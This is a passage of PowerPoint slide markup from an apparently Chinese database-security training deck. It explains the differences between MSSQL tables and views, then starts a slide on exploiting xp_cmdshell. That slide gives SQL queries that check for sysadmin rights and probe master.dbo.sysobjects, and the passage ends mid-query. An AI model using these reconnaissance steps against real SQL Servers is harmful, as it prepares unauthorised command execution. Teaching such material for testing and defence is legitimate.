                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:ln w="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9869524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83447" y="943187"/>
            <a:ext cx="11225107" cy="63829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marL="380990" indent="-380990" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="u"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>MSSql视图和表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRP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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>表与视图区别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>表是存在物理记录的集合，而视图只是一串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>表需占用物理空间，而视图理论上可以不占用物理空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>视图可以将多个表呈现给用户，而表只可以呈现自身</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>视图可以随意删除和重建，而表的删除会导致数据丢失；</a:t>
            </a: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endParaRPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>表与视图之间的联系</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>视图是建立在表的基础之上的一种结构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>视图中的数据可以来源于多张表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>表是实际存在的不依附视图；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>使用视图可以增强表的安全性；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>一句话概括</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1333" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228594" indent="-228594" defTabSz="609585">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="667"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据表是真实存在的，有效数据，视图相当于固定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>语句，当打开视图就行其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1333" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>语句。视图多为几个表的关系联合表达。有助于封装复杂的关系。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="380990" indent="-380990" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143840" y="335251"/>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基本使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BDE63F5-6A89-C048-9F5A-516E037AC12A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8136104" y="1337734"/>
            <a:ext cx="2818664" cy="4182533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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DD2E6D-2A2A-4437-AD96-86366062AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="921572" y="2382235"/>
            <a:ext cx="10577028" cy="4305531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91419" tIns="45710" rIns="91419" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SELECT IS_SRVROLEMEMBER('sysadmin');	#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>判断当前是否为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DBA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>权限，返回 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>即为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SELECT COUNT(*) FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>master.dbo.sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
